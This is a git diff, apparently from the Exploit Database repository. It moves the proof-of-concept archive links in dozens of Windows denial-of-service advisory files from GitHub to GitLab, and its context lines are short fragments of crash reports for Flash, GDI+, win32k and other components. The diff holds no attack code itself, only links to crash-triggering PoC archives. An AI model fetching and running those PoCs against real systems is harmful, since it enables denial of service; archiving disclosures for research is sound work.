Viewer crashes on a faulty PGM image file . Faulty PGM file is attached as POC Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/ \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/ \ No newline at end of file diff --git a/exploits/windows/dos/39509.txt b/exploits/windows/dos/39509.txt index cfc34c092..b3418eab2 100644 --- a/exploits/windows/dos/39509.txt +++ b/exploits/windows/dos/39509.txt @@ -57,4 +57,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php PoC: http://zeroscience.mk/codes/poc5309.pm4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39509.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39509.zip \ No newline at end of file diff --git a/exploits/windows/dos/39512.txt b/exploits/windows/dos/39512.txt index 6b4afe793..4f8dceb6c 100644 --- a/exploits/windows/dos/39512.txt +++ b/exploits/windows/dos/39512.txt @@ -12,4 +12,4 @@ Multiple Access violations POC: https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39512.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39512.zip \ No newline at end of file diff --git a/exploits/windows/dos/39518.txt b/exploits/windows/dos/39518.txt index 0864623a9..c4f51dab3 100644 --- a/exploits/windows/dos/39518.txt +++ b/exploits/windows/dos/39518.txt @@ -12,4 +12,4 @@ Negative height and width values cause a program crash (memory corruption) and S Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39518.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39518.zip \ No newline at end of file diff --git a/exploits/windows/dos/39530.txt b/exploits/windows/dos/39530.txt index e9ff54b0f..6f6ed768f 100644 --- a/exploits/windows/dos/39530.txt +++ b/exploits/windows/dos/39530.txt @@ -121,4 +121,4 @@ This looks like broken authenticode parsing to me. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39530.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip \ No newline at end of file diff --git a/exploits/windows/dos/39533.txt b/exploits/windows/dos/39533.txt index 7c4db386f..96e55f31d 100644 --- a/exploits/windows/dos/39533.txt +++ b/exploits/windows/dos/39533.txt @@ -46,6 +46,6 @@ Technical details: POC: ========== https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39533.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip ######################################################################################## \ No newline at end of file diff --git a/exploits/windows/dos/39546.txt b/exploits/windows/dos/39546.txt index 3f3c40214..23aa8f283 100644 --- a/exploits/windows/dos/39546.txt +++ b/exploits/windows/dos/39546.txt @@ -66,6 +66,6 @@ by pointing to an uninitialized space of memory.An attacker can leverage this vu =========== http://protekresearchlab.com/exploits/COSIG-2016-13.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39546.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39546.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39560.txt b/exploits/windows/dos/39560.txt index 0d423a153..aa0514146 100644 --- a/exploits/windows/dos/39560.txt +++ b/exploits/windows/dos/39560.txt @@ -74,4 +74,4 @@ Attached is an archive with the proof-of-concept mutated OTF file, together with Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39560.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39560.zip \ No newline at end of file diff --git a/exploits/windows/dos/39561.txt b/exploits/windows/dos/39561.txt index 8e4d14c43..a75dd122f 100644 --- a/exploits/windows/dos/39561.txt +++ b/exploits/windows/dos/39561.txt @@ -61,4 +61,4 @@ Attached is an archive with the proof-of-concept mutated OTF file, together with Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39561.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39561.zip \ No newline at end of file diff --git a/exploits/windows/dos/39600.txt b/exploits/windows/dos/39600.txt index 8b3a3f2db..0b76eedd2 100644 --- a/exploits/windows/dos/39600.txt +++ b/exploits/windows/dos/39600.txt @@ -56,4 +56,4 @@ Without page heap, you should get heap corruption, probably writing to 0x4141414 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39600.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39600.zip \ No newline at end of file diff --git a/exploits/windows/dos/39601.txt b/exploits/windows/dos/39601.txt index a9b6a2685..db01a9eee 100644 --- a/exploits/windows/dos/39601.txt +++ b/exploits/windows/dos/39601.txt @@ -12,4 +12,4 @@ The attached testcase will attempt to free() an invalid pointer to demonstrate t Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39601.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39601.zip \ No newline at end of file diff --git a/exploits/windows/dos/39602.txt b/exploits/windows/dos/39602.txt index 9d4dd3d1d..330a178f3 100644 --- a/exploits/windows/dos/39602.txt +++ b/exploits/windows/dos/39602.txt @@ -37,4 +37,4 @@ This is trying to initialize the probabilities array, but overflowing the heap b Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39602.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39602.zip \ No newline at end of file diff --git a/exploits/windows/dos/39603.txt b/exploits/windows/dos/39603.txt index 5390e1d12..5a3a308ed 100644 --- a/exploits/windows/dos/39603.txt +++ b/exploits/windows/dos/39603.txt @@ -35,4 +35,4 @@ script!CreateInstance+0x178ac: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39603.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39603.zip \ No newline at end of file diff --git a/exploits/windows/dos/39605.txt b/exploits/windows/dos/39605.txt index 37e7c51a0..df2cdcb70 100644 --- a/exploits/windows/dos/39605.txt +++ b/exploits/windows/dos/39605.txt @@ -74,4 +74,4 @@ I think the same bug exists in rtcSpaceBstr, rtcSpaceVar, rtcUpperCaseBstr, rtcU Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39605.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39605.zip \ No newline at end of file diff --git a/exploits/windows/dos/39606.txt b/exploits/windows/dos/39606.txt index 2aff9845c..e57b0c7d2 100644 --- a/exploits/windows/dos/39606.txt +++ b/exploits/windows/dos/39606.txt @@ -47,4 +47,4 @@ Please note that many of the CAV modules used by Comodo do not use dynamic base, Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39606.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39606.zip \ No newline at end of file diff --git a/exploits/windows/dos/39608.txt b/exploits/windows/dos/39608.txt index b24f7adfd..6787d1a67 100644 --- a/exploits/windows/dos/39608.txt +++ b/exploits/windows/dos/39608.txt @@ -4,4 +4,4 @@ The attached fuzz case causes a crash in shape rendering. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39608.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39608.zip \ No newline at end of file diff --git a/exploits/windows/dos/39609.txt b/exploits/windows/dos/39609.txt index 5cfc0c130..57ed18d1e 100644 --- a/exploits/windows/dos/39609.txt +++ b/exploits/windows/dos/39609.txt @@ -4,4 +4,4 @@ There is a heap overflow in the Zlib codecs used when playing flv files in flash Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39609.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39609.zip \ No newline at end of file diff --git a/exploits/windows/dos/39610.txt b/exploits/windows/dos/39610.txt index 1a2170201..872715de5 100644 --- a/exploits/windows/dos/39610.txt +++ b/exploits/windows/dos/39610.txt @@ -6,4 +6,4 @@ A sample swf is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39610.zip \ No newline at end of file diff --git a/exploits/windows/dos/39611.txt b/exploits/windows/dos/39611.txt index 8df275766..2a7968b62 100644 --- a/exploits/windows/dos/39611.txt +++ b/exploits/windows/dos/39611.txt @@ -14,4 +14,4 @@ A PoC is attached, it is a bit finicky but crashes in the most recent Chrome Fla Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39611.zip \ No newline at end of file diff --git a/exploits/windows/dos/39612.txt b/exploits/windows/dos/39612.txt index d62eaba30..e582a4570 100644 --- a/exploits/windows/dos/39612.txt +++ b/exploits/windows/dos/39612.txt @@ -13,4 +13,4 @@ A PoC is attached, it is a bit finicky but crashes in the most recent Chrome Fla Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39612.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39612.zip \ No newline at end of file diff --git a/exploits/windows/dos/39613.txt b/exploits/windows/dos/39613.txt index fb5cc2bec..6bee1a6c5 100644 --- a/exploits/windows/dos/39613.txt +++ b/exploits/windows/dos/39613.txt @@ -12,4 +12,4 @@ A PoC is attached, it is a bit finicky and depends a lot on the specific Flash v Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39613.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39613.zip \ No newline at end of file diff --git a/exploits/windows/dos/39647.txt b/exploits/windows/dos/39647.txt index 78624aab4..f5e7163f8 100644 --- a/exploits/windows/dos/39647.txt +++ b/exploits/windows/dos/39647.txt @@ -4,4 +4,4 @@ The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39647.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39647.zip \ No newline at end of file diff --git a/exploits/windows/dos/39648.txt b/exploits/windows/dos/39648.txt index c4423ef89..4e8751715 100644 --- a/exploits/windows/dos/39648.txt +++ b/exploits/windows/dos/39648.txt @@ -4,4 +4,4 @@ The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39648.zip \ No newline at end of file diff --git a/exploits/windows/dos/39743.txt b/exploits/windows/dos/39743.txt index 6c7805739..c9b461d21 100644 --- a/exploits/windows/dos/39743.txt +++ b/exploits/windows/dos/39743.txt @@ -79,4 +79,4 @@ When the "Smooth edges of screen fonts" option is disabled, the bugcheck also oc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39743.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39743.zip \ No newline at end of file diff --git a/exploits/windows/dos/39770.txt b/exploits/windows/dos/39770.txt index 476a51627..a9a676fad 100644 --- a/exploits/windows/dos/39770.txt +++ b/exploits/windows/dos/39770.txt @@ -40,4 +40,4 @@ So it looks like that calculation is used as an index into @rsi, which is obviou Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39770.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39770.zip \ No newline at end of file diff --git a/exploits/windows/dos/39778.txt b/exploits/windows/dos/39778.txt index 9995ea7af..82eb34a4e 100644 --- a/exploits/windows/dos/39778.txt +++ b/exploits/windows/dos/39778.txt @@ -4,4 +4,4 @@ There is a use-after-free that appears to be related to rendering the display ba Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39778.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39778.zip \ No newline at end of file diff --git a/exploits/windows/dos/39779.txt b/exploits/windows/dos/39779.txt index 0918d39db..52b267396 100644 --- a/exploits/windows/dos/39779.txt +++ b/exploits/windows/dos/39779.txt @@ -4,4 +4,4 @@ There is a use-after-free in MovieClip.duplicateMovieClip.If an action associate Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39779.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39779.zip \ No newline at end of file diff --git a/exploits/windows/dos/39819.txt b/exploits/windows/dos/39819.txt index 5ce34c656..545af5494 100644 --- a/exploits/windows/dos/39819.txt +++ b/exploits/windows/dos/39819.txt @@ -6,7 +6,7 @@ Found : 11.05.2016 More: http://HauntIT.blogspot.com Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39819.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39819.zip ---------------------------------------------------------------------- Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 diff --git a/exploits/windows/dos/39832.txt b/exploits/windows/dos/39832.txt index 96424c9fb..3ca7b8c1c 100644 --- a/exploits/windows/dos/39832.txt +++ b/exploits/windows/dos/39832.txt @@ -114,4 +114,4 @@ Another note is that the gdi32.dll SETICMPROFILEA and SETICMPROFILEW record hand Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39832.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39832.zip \ No newline at end of file diff --git a/exploits/windows/dos/39833.txt b/exploits/windows/dos/39833.txt index d90285351..ed6a92eb1 100644 --- a/exploits/windows/dos/39833.txt +++ b/exploits/windows/dos/39833.txt @@ -122,4 +122,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39833.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39833.zip \ No newline at end of file diff --git a/exploits/windows/dos/39959.txt b/exploits/windows/dos/39959.txt index d981b1013..8e479933e 100644 --- a/exploits/windows/dos/39959.txt +++ b/exploits/windows/dos/39959.txt @@ -4,4 +4,4 @@ The attached PoC triggers a blue screen on Windows 7 with special pool enabled o Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39959.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39959.zip \ No newline at end of file diff --git a/exploits/windows/dos/39960.txt b/exploits/windows/dos/39960.txt index 013ed5cf2..b1864d118 100644 --- a/exploits/windows/dos/39960.txt +++ b/exploits/windows/dos/39960.txt @@ -4,4 +4,4 @@ The attached PoC crashes 32-bit Windows 7 with special pool enabled on win32k.sy Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39960.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39960.zip \ No newline at end of file diff --git a/exploits/windows/dos/39990.txt b/exploits/windows/dos/39990.txt index 183c9a1e2..dcdfd0dea 100644 --- a/exploits/windows/dos/39990.txt +++ b/exploits/windows/dos/39990.txt @@ -52,4 +52,4 @@ In order to demonstrate that the bug is real and affects Internet Explorer (amon Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39990.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39990.zip \ No newline at end of file diff --git a/exploits/windows/dos/39991.txt b/exploits/windows/dos/39991.txt index e985517e0..21cacfd94 100644 --- a/exploits/windows/dos/39991.txt +++ b/exploits/windows/dos/39991.txt @@ -149,4 +149,4 @@ References: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39991.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39991.zip \ No newline at end of file diff --git a/exploits/windows/dos/40255.txt b/exploits/windows/dos/40255.txt index 69db8a440..066a9065e 100644 --- a/exploits/windows/dos/40255.txt +++ b/exploits/windows/dos/40255.txt @@ -99,4 +99,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40255.zip \ No newline at end of file diff --git a/exploits/windows/dos/40256.txt b/exploits/windows/dos/40256.txt index 2dba6ec91..9a8eb5bba 100644 --- a/exploits/windows/dos/40256.txt +++ b/exploits/windows/dos/40256.txt @@ -81,4 +81,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40256.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40256.zip \ No newline at end of file diff --git a/exploits/windows/dos/40257.txt b/exploits/windows/dos/40257.txt index add314e0b..f2d239371 100644 --- a/exploits/windows/dos/40257.txt +++ b/exploits/windows/dos/40257.txt @@ -119,4 +119,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40257.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40257.zip \ No newline at end of file diff --git a/exploits/windows/dos/40398.txt b/exploits/windows/dos/40398.txt index db1ce109f..e875ab372 100644 --- a/exploits/windows/dos/40398.txt +++ b/exploits/windows/dos/40398.txt @@ -56,4 +56,4 @@ Attached is a Proof of Concept Python script, which connects to the COM1 serial Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40398.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40398.zip \ No newline at end of file diff --git a/exploits/windows/dos/40399.txt b/exploits/windows/dos/40399.txt index efcf9efbe..946bea1de 100644 --- a/exploits/windows/dos/40399.txt +++ b/exploits/windows/dos/40399.txt @@ -62,4 +62,4 @@ It was empirically confirmed that some of the heap corruptions can be leveraged Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40399.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40399.zip \ No newline at end of file diff --git a/exploits/windows/dos/40406.txt b/exploits/windows/dos/40406.txt index 3b949121b..2fd37c282 100644 --- a/exploits/windows/dos/40406.txt +++ b/exploits/windows/dos/40406.txt @@ -83,4 +83,4 @@ Given the different crashing contexts related to timing when breakpoints are set Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40406.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40406.zip \ No newline at end of file diff --git a/exploits/windows/dos/40411.txt b/exploits/windows/dos/40411.txt index 222934ca2..bc8077eea 100644 --- a/exploits/windows/dos/40411.txt +++ b/exploits/windows/dos/40411.txt @@ -4,7 +4,7 @@ Date: Aug 31st, 2016 Complete Proof of Concept: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40411.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40411.zip Tag: jsch recursive sftp get client-side windows path traversal diff --git a/exploits/windows/dos/4044.txt b/exploits/windows/dos/4044.txt index 3e0583835..9c8782cfd 100644 --- a/exploits/windows/dos/4044.txt +++ b/exploits/windows/dos/4044.txt @@ -5,6 +5,6 @@ #################################### highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4044.zip (06072007-CVE-2007-2237.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4044.zip (06072007-CVE-2007-2237.zip) # milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/exploits/windows/dos/40508.txt b/exploits/windows/dos/40508.txt index 8bc753891..828ca35d8 100644 --- a/exploits/windows/dos/40508.txt +++ b/exploits/windows/dos/40508.txt @@ -55,6 +55,6 @@ The specific flaw exists within the parsing process of an invalid JPG in WRF fil ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/09/COSIG-2016-33.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40508.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40508.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/40509.txt b/exploits/windows/dos/40509.txt index c126a904a..746d595f1 100644 --- a/exploits/windows/dos/40509.txt +++ b/exploits/windows/dos/40509.txt @@ -55,6 +55,6 @@ The flaw exists within the parsing process of an invalid ARF file. An attacker c ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/09/COSIG-2016-34.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40509.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40509.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/40598.txt b/exploits/windows/dos/40598.txt index 3318c1784..1b78a375c 100644 --- a/exploits/windows/dos/40598.txt +++ b/exploits/windows/dos/40598.txt @@ -96,4 +96,4 @@ Attached is an archive with two proof of concept font files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40598.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40598.zip \ No newline at end of file diff --git a/exploits/windows/dos/40599.txt b/exploits/windows/dos/40599.txt index 1e834c9a2..3df7744c5 100644 --- a/exploits/windows/dos/40599.txt +++ b/exploits/windows/dos/40599.txt @@ -160,4 +160,4 @@ Attached is an archive with three proof of concept font files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40599.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40599.zip \ No newline at end of file diff --git a/exploits/windows/dos/40600.txt b/exploits/windows/dos/40600.txt index 94e94af6c..a66212dd1 100644 --- a/exploits/windows/dos/40600.txt +++ b/exploits/windows/dos/40600.txt @@ -47,4 +47,4 @@ Attached are three proof of concept hive files. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40600.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40600.zip \ No newline at end of file diff --git a/exploits/windows/dos/40601.txt b/exploits/windows/dos/40601.txt index 5c48fdf5f..928552020 100644 --- a/exploits/windows/dos/40601.txt +++ b/exploits/windows/dos/40601.txt @@ -52,4 +52,4 @@ The issue reproduces on Windows 7 and 8.1. In order to reproduce the problem wit Attached is a proof of concept hive file. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40601.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40601.zip \ No newline at end of file diff --git a/exploits/windows/dos/40617.txt b/exploits/windows/dos/40617.txt index 56e6d0f39..b36b459c0 100644 --- a/exploits/windows/dos/40617.txt +++ b/exploits/windows/dos/40617.txt @@ -197,4 +197,4 @@ qcpfformat+0x13dc: POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40617.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40617.zip \ No newline at end of file diff --git a/exploits/windows/dos/40656.txt b/exploits/windows/dos/40656.txt index 1f0ddf3ca..f4c7e6366 100644 --- a/exploits/windows/dos/40656.txt +++ b/exploits/windows/dos/40656.txt @@ -56,4 +56,4 @@ However, this doesn't change the fact that with the provided PoC, the pool alloc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40656.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40656.zip \ No newline at end of file diff --git a/exploits/windows/dos/40657.txt b/exploits/windows/dos/40657.txt index 6b2d30482..ee3260fcf 100644 --- a/exploits/windows/dos/40657.txt +++ b/exploits/windows/dos/40657.txt @@ -44,4 +44,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40657.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40657.zip \ No newline at end of file diff --git a/exploits/windows/dos/40658.txt b/exploits/windows/dos/40658.txt index eae3c1452..ee8e213cd 100644 --- a/exploits/windows/dos/40658.txt +++ b/exploits/windows/dos/40658.txt @@ -54,4 +54,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40658.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40658.zip \ No newline at end of file diff --git a/exploits/windows/dos/40659.txt b/exploits/windows/dos/40659.txt index 68ab359c8..b50aeca28 100644 --- a/exploits/windows/dos/40659.txt +++ b/exploits/windows/dos/40659.txt @@ -27,4 +27,4 @@ For completeness, it looks like many of the other escape handlers in the same fu Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40659.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40659.zip \ No newline at end of file diff --git a/exploits/windows/dos/40661.txt b/exploits/windows/dos/40661.txt index 87e514d4d..9593c21f6 100644 --- a/exploits/windows/dos/40661.txt +++ b/exploits/windows/dos/40661.txt @@ -45,4 +45,4 @@ To reproduce, compile as a x64 executable and run (requires WDK for D3DKMTEscape Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40661.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40661.zip \ No newline at end of file diff --git a/exploits/windows/dos/40662.txt b/exploits/windows/dos/40662.txt index fc036ffb7..0660786da 100644 --- a/exploits/windows/dos/40662.txt +++ b/exploits/windows/dos/40662.txt @@ -37,4 +37,4 @@ all the right values for the machine it's running on. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40662.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40662.zip \ No newline at end of file diff --git a/exploits/windows/dos/40663.txt b/exploits/windows/dos/40663.txt index ac7f38e80..76b03f973 100644 --- a/exploits/windows/dos/40663.txt +++ b/exploits/windows/dos/40663.txt @@ -39,4 +39,4 @@ To reproduce, compile PoC as a x64 executable and run (requires WDK for D3DKMTEs Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40663.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40663.zip \ No newline at end of file diff --git a/exploits/windows/dos/40664.txt b/exploits/windows/dos/40664.txt index 0d05af125..9c7e9c850 100644 --- a/exploits/windows/dos/40664.txt +++ b/exploits/windows/dos/40664.txt @@ -44,4 +44,4 @@ To reproduce, compile as an x64 executable an run (requires WDK for D3DKMTEscape Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40664.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40664.zip \ No newline at end of file diff --git a/exploits/windows/dos/40665.txt b/exploits/windows/dos/40665.txt index 14f933a8c..2316e5113 100644 --- a/exploits/windows/dos/40665.txt +++ b/exploits/windows/dos/40665.txt @@ -57,4 +57,4 @@ fffff801`02461188 8941fc mov dword ptr [rcx-4],eax ds:ffffc001`cd33 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40665.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40665.zip \ No newline at end of file diff --git a/exploits/windows/dos/40666.txt b/exploits/windows/dos/40666.txt index c91755e5f..ef864bfd8 100644 --- a/exploits/windows/dos/40666.txt +++ 